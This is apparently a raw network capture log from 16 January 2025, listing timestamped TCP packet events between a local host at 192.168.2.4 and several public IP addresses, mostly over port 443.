                Jan 16, 2025 08:07:34.025836945 CET49747443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:34.025845051 CET44349747172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:34.025907040 CET49747443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:34.026276112 CET49747443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:34.026288986 CET44349747172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:34.494018078 CET4434974635.190.80.1192.168.2.4
                Jan 16, 2025 08:07:34.494291067 CET49746443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:34.494306087 CET4434974635.190.80.1192.168.2.4
                Jan 16, 2025 08:07:34.495949984 CET4434974635.190.80.1192.168.2.4
                Jan 16, 2025 08:07:34.496016026 CET49746443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:34.497337103 CET49746443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:34.497421980 CET4434974635.190.80.1192.168.2.4
                Jan 16, 2025 08:07:34.497500896 CET49746443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:34.497508049 CET4434974635.190.80.1192.168.2.4
                Jan 16, 2025 08:07:34.519248962 CET44349747172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:34.519465923 CET49747443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:34.519480944 CET44349747172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:34.521162987 CET44349747172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:34.521223068 CET49747443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:34.521481037 CET49747443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:34.521497011 CET49747443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:34.521547079 CET49747443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:34.521735907 CET44349747172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:34.521789074 CET49747443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:34.521933079 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:34.521970987 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:34.522026062 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:34.522217035 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:34.522229910 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:34.541340113 CET49746443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:34.618978977 CET4434974635.190.80.1192.168.2.4
                Jan 16, 2025 08:07:34.619168997 CET4434974635.190.80.1192.168.2.4
                Jan 16, 2025 08:07:34.619216919 CET49746443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:34.619266033 CET49746443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:34.619266033 CET49746443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:34.619280100 CET4434974635.190.80.1192.168.2.4
                Jan 16, 2025 08:07:34.619328022 CET49746443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:34.620234966 CET49749443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:34.620259047 CET4434974935.190.80.1192.168.2.4
                Jan 16, 2025 08:07:34.620323896 CET49749443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:34.620527983 CET49749443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:34.620542049 CET4434974935.190.80.1192.168.2.4
                Jan 16, 2025 08:07:34.994447947 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:34.994908094 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:34.994921923 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:34.996429920 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:34.998049974 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:34.998229980 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:34.998390913 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.041737080 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.098086119 CET4434974935.190.80.1192.168.2.4
                Jan 16, 2025 08:07:35.143013000 CET49749443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:35.258651018 CET49749443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:35.258667946 CET4434974935.190.80.1192.168.2.4
                Jan 16, 2025 08:07:35.260251999 CET4434974935.190.80.1192.168.2.4
                Jan 16, 2025 08:07:35.285705090 CET49749443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:35.285876036 CET49749443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:35.285882950 CET4434974935.190.80.1192.168.2.4
                Jan 16, 2025 08:07:35.286108971 CET4434974935.190.80.1192.168.2.4
                Jan 16, 2025 08:07:35.297280073 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.297411919 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.297494888 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.297503948 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.297527075 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.297574997 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.297616959 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.297725916 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.297770977 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.297780991 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.301769972 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.301867008 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.301875114 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.301944971 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.301996946 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.302004099 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.326545000 CET49749443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:35.341521978 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.341532946 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.383970022 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.384043932 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.384058952 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.384144068 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.384198904 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.384207010 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.384313107 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.384360075 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.384378910 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.384468079 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.384521008 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.384527922 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.384617090 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.384671926 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.384679079 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.384768009 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.384846926 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.384855032 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.384922981 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.385004997 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.385046959 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.385055065 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.385173082 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.385229111 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.385237932 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.385375023 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.385783911 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.385987997 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.386040926 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.386049986 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.386136055 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.386184931 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.386192083 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.386293888 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.386343956 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.386351109 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.416115046 CET4434974935.190.80.1192.168.2.4
                Jan 16, 2025 08:07:35.416326046 CET4434974935.190.80.1192.168.2.4
                Jan 16, 2025 08:07:35.416376114 CET49749443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:35.416441917 CET49749443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:35.416460037 CET4434974935.190.80.1192.168.2.4
                Jan 16, 2025 08:07:35.416471004 CET49749443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:35.416563034 CET49749443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:35.433938026 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.470788002 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.470933914 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.470993996 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.471002102 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.471035004 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.471087933 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.471120119 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.471204996 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.471285105 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.471296072 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.471353054 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.471357107 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.471384048 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.471432924 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.471473932 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.471524954 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.471558094 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.471628904 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.472119093 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.472204924 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.472250938 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.472306967 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.472338915 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.472393036 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.473000050 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.473078012 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.473140955 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.473203897 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.473244905 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.473299026 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.473339081 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.473447084 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.473694086 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.473750114 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.475701094 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.475764036 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.475781918 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.475838900 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.557133913 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.557188034 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.557210922 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.557224035 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.557239056 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.557351112 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.557410955 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.557420015 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.557495117 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.557539940 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.557548046 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.557600975 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.557634115 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.557641029 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.557663918 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.557698965 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.557758093 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.557765007 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.557802916 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.557893991 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.557913065 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.557943106 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.557975054 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.557986021 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.558046103 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.558101892 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.558146954 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.558197975 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.558244944 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.558300972 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.558379889 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.558437109 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.558490038 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.558541059 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.558589935 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.558645010 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.558680058 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.558743954 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.560376883 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.560444117 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.560467005 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.560511112 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.560523033 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.560565948 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.560581923 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.560626984 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.560791969 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.560836077 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.560971022 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.561024904 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.561096907 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.561144114 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.561158895 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.561203003 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.561301947 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.561352968 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.561507940 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.561567068 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.561572075 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.561589003 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.561609030 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.561636925 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.644741058 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.644798994 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.644825935 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.644838095 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.644851923 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.645092964 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.645137072 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.645159006 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.645169020 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.645193100 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.645637035 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.645689011 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.645714045 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.645723104 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.645736933 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.645757914 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.646450996 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.646516085 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.646521091 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.646549940 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.646569967 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.646960974 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.647008896 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.647018909 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.647068977 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.647099018 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.647627115 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.647669077 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.647701025 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.647710085 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.647722006 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.648152113 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.648200035 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.648217916 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.648227930 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.648241043 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.648261070 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.685424089 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.685478926 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.685533047 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.685544968 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.685579062 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.731467962 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.731663942 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.731694937 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.731740952 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.731740952 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.731775045 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.731785059 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.731797934 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.731822968 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.731983900 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.732029915 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.732045889 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.732055902 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.732081890 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.732090950 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.732697010 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.732768059 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.732786894 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.732795000 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.732820988 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.732830048 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.733562946 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.733620882 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.733652115 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.733659029 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.733686924 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.733707905 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.733834982 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.733880997 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.733906031 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.733912945 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.733937979 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.733957052 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.734117031 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.734169006 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.734189034 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.734198093 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.734229088 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.734236956 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.734843016 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.734888077 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.734960079 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.734986067 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.735002995 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.735125065 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.772540092 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.772605896 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.772623062 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.772664070 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.772665024 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.772721052 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.818347931 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.818423986 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.818433046 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.818455935 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.818484068 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.818499088 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.818665981 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.818710089 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.818727970 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.818757057 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.818758011 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.818800926 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.819580078 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.819664001 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.819672108 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.819695950 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.819705009 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.819724083 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.819737911 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.819885015 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.819926977 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.819943905 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.819967985 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.819991112 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.820004940 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.820017099 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.820168972 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:35.820359945 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.820533037 CET49748443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:35.820553064 CET44349748172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:36.929786921 CET4972380192.168.2.4199.232.214.172
                Jan 16, 2025 08:07:36.935811996 CET8049723199.232.214.172192.168.2.4
                Jan 16, 2025 08:07:36.935894012 CET4972380192.168.2.4199.232.214.172
                Jan 16, 2025 08:07:37.760137081 CET44349737142.250.186.164192.168.2.4
                Jan 16, 2025 08:07:37.760282993 CET44349737142.250.186.164192.168.2.4
                Jan 16, 2025 08:07:37.760339975 CET49737443192.168.2.4142.250.186.164
                Jan 16, 2025 08:07:39.435590029 CET49737443192.168.2.4142.250.186.164
                Jan 16, 2025 08:07:39.435611963 CET44349737142.250.186.164192.168.2.4
                Jan 16, 2025 08:07:45.250416994 CET44349743104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:45.250509977 CET44349743104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:45.250576019 CET49743443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:45.436429024 CET49743443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:45.436458111 CET44349743104.21.32.1192.168.2.4
                Jan 16, 2025 08:08:19.808674097 CET4972480192.168.2.4199.232.214.172
                Jan 16, 2025 08:08:19.813877106 CET8049724199.232.214.172192.168.2.4
                Jan 16, 2025 08:08:19.813949108 CET4972480192.168.2.4199.232.214.172
                Jan 16, 2025 08:08:27.231626987 CET49874443192.168.2.4142.250.186.164
                Jan 16, 2025 08:08:27.231672049 CET44349874142.250.186.164192.168.2.4
                Jan 16, 2025 08:08:27.231749058 CET49874443192.168.2.4142.250.186.164
                Jan 16, 2025 08:08:27.231992960 CET49874443192.168.2.4142.250.186.164
                Jan 16, 2025 08:08:27.232017040 CET44349874142.250.186.164192.168.2.4
